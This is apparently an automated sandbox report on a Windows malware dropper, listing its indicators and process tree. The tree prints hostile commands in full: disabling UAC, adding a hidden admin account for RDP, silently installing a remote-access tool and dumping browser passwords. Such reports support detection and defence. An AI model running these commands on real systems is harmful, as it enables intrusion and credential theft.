rutserv.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 1428 rutserv.exe 1428 rutserv.exe 4344 rutserv.exe 4344 rutserv.exe 4344 rutserv.exe 4344 rutserv.exe 4344 rutserv.exe 4344 rutserv.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 4516 winit.exe 4516 winit.exe 4516 winit.exe 4516 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskhostw.exepid process 2312 taskhostw.exe -
Suspicious behavior: LoadsDriver 4 IoCs
Processes:
pid process 632 632 632 632 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes:
chrome.exepid process 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
rfusclient.exepid process 2812 rfusclient.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rutserv.exetaskkill.exerutserv.exetaskkill.exerutserv.exepowershell.exetakeown.exeicacls.exetaskkill.exeRDPWInst.exesvchost.exetaskkill.exetaskkill.exeAppHost.exetaskmgr.exechrome.exedescription pid process Token: SeDebugPrivilege 864 rutserv.exe Token: SeDebugPrivilege 4116 taskkill.exe Token: SeDebugPrivilege 1428 rutserv.exe Token: SeDebugPrivilege 3084 taskkill.exe Token: SeTakeOwnershipPrivilege 4344 rutserv.exe Token: SeTcbPrivilege 4344 rutserv.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeTcbPrivilege 4344 rutserv.exe Token: SeTakeOwnershipPrivilege 4052 takeown.exe Token: SeRestorePrivilege 4404 icacls.exe Token: SeDebugPrivilege 2692 taskkill.exe Token: SeDebugPrivilege 4956 RDPWInst.exe Token: SeAuditPrivilege 4120 svchost.exe Token: SeDebugPrivilege 4424 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeLockMemoryPrivilege 1116 AppHost.exe Token: SeLockMemoryPrivilege 1116 AppHost.exe Token: SeAuditPrivilege 4120 svchost.exe Token: SeAuditPrivilege 4120 svchost.exe Token: SeDebugPrivilege 4376 taskmgr.exe Token: SeSystemProfilePrivilege 4376 taskmgr.exe Token: SeCreateGlobalPrivilege 4376 taskmgr.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe Token: SeShutdownPrivilege 2792 chrome.exe Token: SeCreatePagefilePrivilege 2792 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exechrome.exepid process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exechrome.exepid process 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 4376 taskmgr.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe 2792 chrome.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
Processes:
winit.exesvchost.exeP.exeP.exerutserv.exeR8.exerutserv.exewinlogon.exeVega.exerutserv.exerutserv.exeVegas.exeMOS.exeWinMail.exeWinMail.exeM.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exebd38e93c22ab359d615e7464fd252363_JaffaCakes118.exepid process 4516 winit.exe 2920 svchost.exe 924 P.exe 1884 P.exe 864 rutserv.exe 1308 R8.exe 4868 rutserv.exe 1032 winlogon.exe 4232 Vega.exe 1428 rutserv.exe 4344 rutserv.exe 768 Vegas.exe 4444 MOS.exe 5052 WinMail.exe 1248 WinMail.exe 2420 M.exe 2756 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 3324 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4012 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 2660 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 4876 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 764 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe 5020 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exeLogs.exewinit.execmd.execmd.execmd.exeWScript.execmd.exeCheat.execmd.exesvchost.execmd.execmd.exedescription pid process target process PID 4556 wrote to memory of 4840 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Logs.exe PID 4556 wrote to memory of 4840 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Logs.exe PID 4556 wrote to memory of 4840 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Logs.exe PID 4556 wrote to memory of 4136 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe winit.exe PID 4556 wrote to memory of 4136 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe winit.exe PID 4556 wrote to memory of 4136 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe winit.exe PID 4840 wrote to memory of 624 4840 Logs.exe cmd.exe PID 4840 wrote to memory of 624 4840 Logs.exe cmd.exe PID 4840 wrote to memory of 624 4840 Logs.exe cmd.exe PID 4556 wrote to memory of 3272 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Cheat.exe PID 4556 wrote to memory of 3272 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Cheat.exe PID 4556 wrote to memory of 3272 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Cheat.exe PID 4556 wrote to memory of 3180 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 3180 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 3180 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4136 wrote to memory of 4112 4136 winit.exe WScript.exe PID 4136 wrote to memory of 4112 4136 winit.exe WScript.exe PID 4136 wrote to memory of 4112 4136 winit.exe WScript.exe PID 4136 wrote to memory of 4516 4136 winit.exe winit.exe PID 4136 wrote to memory of 4516 4136 winit.exe winit.exe PID 4136 wrote to memory of 4516 4136 winit.exe winit.exe PID 4556 wrote to memory of 4212 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 4212 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 4212 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 3180 wrote to memory of 3016 3180 cmd.exe sc.exe PID 3180 wrote to memory of 3016 3180 cmd.exe sc.exe PID 3180 wrote to memory of 3016 3180 cmd.exe sc.exe PID 4556 wrote to memory of 2004 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 2004 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 2004 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 2640 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 2640 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 2640 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4212 wrote to memory of 1192 4212 cmd.exe cmd.exe PID 4212 wrote to memory of 1192 4212 cmd.exe cmd.exe PID 4212 wrote to memory of 1192 4212 cmd.exe cmd.exe PID 624 wrote to memory of 4484 624 cmd.exe timeout.exe PID 624 wrote to memory of 4484 624 cmd.exe timeout.exe PID 624 wrote to memory of 4484 624 cmd.exe timeout.exe PID 4112 wrote to memory of 1560 4112 WScript.exe cmd.exe PID 4112 wrote to memory of 1560 4112 WScript.exe cmd.exe PID 4112 wrote to memory of 1560 4112 WScript.exe cmd.exe PID 2004 wrote to memory of 2976 2004 cmd.exe sc.exe PID 2004 wrote to memory of 2976 2004 cmd.exe sc.exe PID 2004 wrote to memory of 2976 2004 cmd.exe sc.exe PID 3272 wrote to memory of 2920 3272 Cheat.exe svchost.exe PID 3272 wrote to memory of 2920 3272 Cheat.exe svchost.exe PID 3272 wrote to memory of 2920 3272 Cheat.exe svchost.exe PID 2640 wrote to memory of 4476 2640 cmd.exe Conhost.exe PID 2640 wrote to memory of 4476 2640 cmd.exe Conhost.exe PID 2640 wrote to memory of 4476 2640 cmd.exe Conhost.exe PID 2920 wrote to memory of 924 2920 svchost.exe P.exe PID 2920 wrote to memory of 924 2920 svchost.exe P.exe PID 2920 wrote to memory of 924 2920 svchost.exe P.exe PID 1560 wrote to memory of 2312 1560 cmd.exe regedit.exe PID 1560 wrote to memory of 2312 1560 cmd.exe regedit.exe PID 1560 wrote to memory of 2312 1560 cmd.exe regedit.exe PID 4556 wrote to memory of 3296 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 3296 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 4556 wrote to memory of 3296 4556 bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe cmd.exe PID 1560 wrote to memory of 3008 1560 cmd.exe timeout.exe PID 1560 wrote to memory of 3008 1560 cmd.exe timeout.exe PID 1560 wrote to memory of 3008 1560 cmd.exe timeout.exe PID 3296 wrote to memory of 1536 3296 cmd.exe sc.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 7 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 4144 attrib.exe 4416 attrib.exe 4476 attrib.exe 3836 attrib.exe 2344 attrib.exe 4564 attrib.exe 4532 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in System32 directory
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4556 -
C:\ProgramData\Microsoft\Intel\Logs.exeC:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\L.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4484
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:1248
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:3408
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4680
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4076
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:4388
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak4⤵
- Delays execution with timeout.exe
PID:2680
-
-
-
-
C:\ProgramData\Microsoft\Intel\winit.exeC:\ProgramData\Microsoft\Intel\winit.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\regedit.exeregedit /s "regedit.reg"5⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:2312
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
PID:3008
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:864
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4868
-
-
C:\Programdata\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1428
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
PID:4144
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
PID:4416
-
-
-
-
C:\Programdata\Windows\winit.exe"C:\Programdata\Windows\winit.exe"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4516 -
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
PID:5052 -
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
PID:1248
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵PID:3420
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:4552
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\Cheat.exeC:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3272 -
C:\programdata\microsoft\intel\svchost.exe"C:\programdata\microsoft\intel\svchost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:924 -
C:\programdata\microsoft\rootsystem\P.exe"C:\programdata\microsoft\rootsystem\P.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1884
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"5⤵PID:4092
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt6⤵PID:528
-
C:\programdata\microsoft\rootsystem\1.exeC:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4416
-
-
-
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1308 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵PID:1936
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
PID:4380 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:764
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:4924
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
PID:4156
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:3532
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵PID:4432
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵PID:2960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵PID:4672
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵PID:2288
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4572
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵PID:1992
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵PID:4580
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵PID:1884
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵PID:4156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵PID:4728
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵PID:2304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:4404
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵PID:4016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵PID:4420
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" "John" /add9⤵PID:1488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" "John" /add10⤵PID:3852
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵PID:836
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵PID:4116
-
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
- Hide Artifacts: Hidden Users
PID:488
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4956 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2348
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
PID:4420
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3836
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2344
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4564
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\users\john"9⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4532
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:4084
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1234⤵
- Executes dropped EXE
PID:4916 -
C:\programdata\microsoft\intel\winlogon.exe"C:\programdata\microsoft\intel\winlogon.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1032 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC5D.tmp\AC5E.bat C:\programdata\microsoft\intel\winlogon.exe"6⤵PID:700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"7⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\Vega.exeC:\ProgramData\Microsoft\Intel\Vega.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4232 -
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exeC:\ProgramData\Microsoft\Intel\Vegas.sfx.exe -p1235⤵
- Executes dropped EXE
PID:380 -
C:\programdata\microsoft\intel\Vegas.exe"C:\programdata\microsoft\intel\Vegas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:768 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CF56.tmp\CF57.bat C:\programdata\microsoft\intel\Vegas.exe"7⤵PID:4048
-
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\systemreset.exe8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4052
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\systemreset.exe /setowner Admin8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
